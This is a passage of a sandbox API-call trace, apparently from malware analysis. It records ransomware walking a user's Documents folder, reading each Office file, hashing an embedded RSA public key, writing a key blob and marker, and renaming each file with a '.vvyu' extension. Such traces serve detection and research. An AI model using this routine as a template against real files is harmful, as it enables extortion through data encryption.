lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.699] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.699] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.699] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.700] CloseHandle (hObject=0x584) returned 1 [0184.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0184.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.701] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\HStSZLrr9ZV1_V.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hstszlrr9zv1_v.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\HStSZLrr9ZV1_V.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hstszlrr9zv1_v.xlsx.vvyu")) returned 1 [0184.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.703] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0184.705] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8828590, ftCreationTime.dwHighDateTime=0x1d8963e, ftLastAccessTime.dwLowDateTime=0xf2337830, ftLastAccessTime.dwHighDateTime=0x1d89d55, ftLastWriteTime.dwLowDateTime=0xf2337830, ftLastWriteTime.dwHighDateTime=0x1d89d55, nFileSizeHigh=0x0, nFileSizeLow=0x15ced, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iudig2j9JtQfGbCV6n.docx", cAlternateFileName="IUDIG2~1.DOC")) returned 1 [0184.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31570 [0184.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31570 | out: hHeap=0x6a0000) returned 1 [0184.706] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\iudig2j9JtQfGbCV6n.docx") returned=".docx" [0184.706] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\iudig2j9JtQfGbCV6n.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\iudig2j9jtqfgbcv6n.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.707] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=89325) returned 1 [0184.707] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.710] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15cc7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.710] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.713] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.713] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x15ced, lpOverlapped=0x0) returned 1 [0184.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.714] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.714] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.715] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.715] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.715] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.715] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.715] GetLastError () returned 0x0 [0184.715] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.715] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.716] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.716] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.716] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15cf0) returned 0x2d43778 [0184.717] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31570 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d315b8 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.718] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9f0 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e9d8 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.720] GetCurrentThreadId () returned 0x264 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36e68 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.721] GetCurrentThreadId () returned 0x264 [0184.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea38 [0184.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9f0 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea50 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea20 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea68 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea08 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9d8 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea68 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea50 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.729] HeapFree (in: 